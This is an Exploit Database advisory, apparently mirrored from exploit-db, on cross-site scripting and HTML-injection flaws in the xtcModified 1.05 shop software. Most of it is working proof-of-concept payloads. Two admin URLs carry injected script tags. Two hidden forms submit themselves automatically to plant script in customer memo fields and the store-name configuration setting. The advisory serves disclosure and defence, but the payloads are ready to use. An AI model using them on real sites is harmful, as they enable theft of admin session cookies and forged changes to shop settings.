xtcModified 1.05 – Multiple HTML Injection / Cross-Site Scripting Vulnerabilities

• Exploit Database
• 16 阅读

• 作者： High-Tech Bridge SA
  日期： 2011-03-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35408/

• source: https://www.securityfocus.com/bid/46681/info
  
  xtcModified is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
  
  Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
  
  xtcModified 1.05 is vulnerable; other versions may also be affected. 
  
  Cross-site scripting:
  
  http://www.example/admin/categories.php?search=prod"><script>alert(document.cookie)</script>
  http://www.example/admin/orders.php?selected_box=customers"><script>alert(document.cookie)</script>&status=0
  
  Html-injection:
  
  1. 
  
  <form action="http://www.example/admin/customers.php?cID=1&action=update" method="post" name="main">
  
  <input type="hidden" name="default_address_id" value="1">
  <input type="hidden" name="customers_gender" value="m">
  <input type="hidden" name="csID" value="">
  <input type="hidden" name="customers_firstname" value="FirstName">
  <input type="hidden" name="customers_lastname" value="LName">
  <input type="hidden" name="customers_dob" value="01/01/2007">
  <input type="hidden" name="customers_email_address" value="email@example.com">
  <input type="hidden" name="entry_company" value="company">
  <input type="hidden" name="entry_password" value="mypass">
  <input type="hidden" name="memo_title" value=&#039;mmtitle"><script>alert(document.cookie)</script>&#039;>
  <input type="hidden" name="memo_text" value=&#039;txt"><script>alert(document.cookie)</script>&#039;>
  
  </form>
  <script>
  document.main.submit();
  </script>
  
  
  2. 
  
  <form action="http://www.example/admin/configuration.php?gID=1&action=save" method="post" name="main">
  
  <input type="hidden" name="STORE_NAME" value=&#039;My Store"><script>alert(document.cookie)</script>&#039;>
  <input type="hidden" name="STORE_OWNER" value="Owner">
  <input type="hidden" name="STORE_OWNER_EMAIL_ADDRESS" value="email@example.com">
  <input type="hidden" name="STORE_COUNTRY" value="81">
  <input type="hidden" name="STORE_ZONE" value="80">
  <input type="hidden" name="EXPECTED_PRODUCTS_SORT" value="desc">
  <input type="hidden" name="EXPECTED_PRODUCTS_FIELD" value="date_expected">
  <input type="hidden" name="DISPLAY_CART" value="true">
  <input type="hidden" name="ADVANCED_SEARCH_DEFAULT_OPERATOR" value="and">
  <input type="hidden" name="STORE_NAME_ADDRESS" value="address">
  <input type="hidden" name="CURRENT_TEMPLATE" value="xtc5">
  </form>
  <script>
  document.main.submit();
  </script>